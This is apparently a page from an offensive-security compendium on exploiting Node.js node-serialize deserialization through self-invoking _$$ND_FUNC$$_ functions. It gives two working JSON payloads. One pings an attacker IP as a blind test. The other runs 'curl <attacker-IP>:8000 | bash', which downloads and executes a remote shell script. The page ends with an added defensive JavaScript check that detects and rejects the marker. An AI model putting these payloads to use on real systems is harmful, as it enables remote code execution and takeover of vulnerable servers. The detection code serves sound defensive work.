killchain-compendium/Exploits/Web/Node.js Deserialization.md


De/Serialization

  • A string value prefixed with `_$$ND_FUNC$$_` is rebuilt into a function by `unserialize()`; written as `_$$ND_FUNC$$_function (){}()` (note the trailing `()`) it becomes an IIFE, so the code is executed as soon as the payload is parsed

Example Payloads

  • Encode, send and wait with `sudo tcpdump -i <interface> icmp`

```json
{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('ping -c 10 <attacker-IP>', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
```

Reverse shell via:

```json
{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('curl <attacker-IP>:8000 | bash', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
```
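As an added defensive example (not part of the compendium), the check an application should run on a decoded cookie before deserializing it: it flags the `_$$ND_FUNC$$_` marker the payloads above rely on, records whether the value is self-invoking, and rejects the input instead of handing it to `unserialize()`. The cookie samples are constructed.

```javascript
// Added example, not from the compendium: detect node-serialize function
// markers in untrusted input before it ever reaches unserialize().
const FUNC_FLAG = '_$$ND_FUNC$$_';

// Walk a parsed JSON value and collect every string carrying the marker.
// Each finding records the JSON path and whether the value is self-invoking
// (trailing "()"), which is what makes it run during deserialization instead
// of only when the rebuilt function is later called.
function findSerializedFunctions(value, path = '$', findings = []) {
  if (typeof value === 'string') {
    if (value.startsWith(FUNC_FLAG)) {
      const body = value.slice(FUNC_FLAG.length);
      findings.push({ path, selfInvoking: /\}\s*\(\s*\)\s*$/.test(body) });
    }
  } else if (Array.isArray(value)) {
    value.forEach((v, i) => findSerializedFunctions(v, `${path}[${i}]`, findings));
  } else if (value !== null && typeof value === 'object') {
    for (const [k, v] of Object.entries(value)) {
      findSerializedFunctions(v, `${path}.${k}`, findings);
    }
  }
  return findings;
}

// Parse untrusted input with JSON.parse, which never evaluates code, and
// refuse it outright if any marker is present. Run this on the decoded
// cookie instead of handing it to unserialize().
function parseUntrusted(raw) {
  const parsed = JSON.parse(raw);
  const findings = findSerializedFunctions(parsed);
  if (findings.length > 0) {
    const paths = findings.map((f) => f.path).join(', ');
    const err = new Error(`rejected: serialized function at ${paths}`);
    err.findings = findings;
    throw err;
  }
  return parsed;
}

// Constructed samples standing in for a base64-decoded profile cookie. The
// second has the same IIFE shape as the payloads above, with a harmless body.
const BENIGN_COOKIE = '{"username":"alice","role":"user"}';
const HOSTILE_COOKIE = JSON.stringify({
  username: 'alice',
  pwn: '_$$ND_FUNC$$_function () {\n \t return 1;\n }()',
});

console.log(findSerializedFunctions(JSON.parse(HOSTILE_COOKIE))); // → [ { path: '$.pwn', selfInvoking: true } ]
```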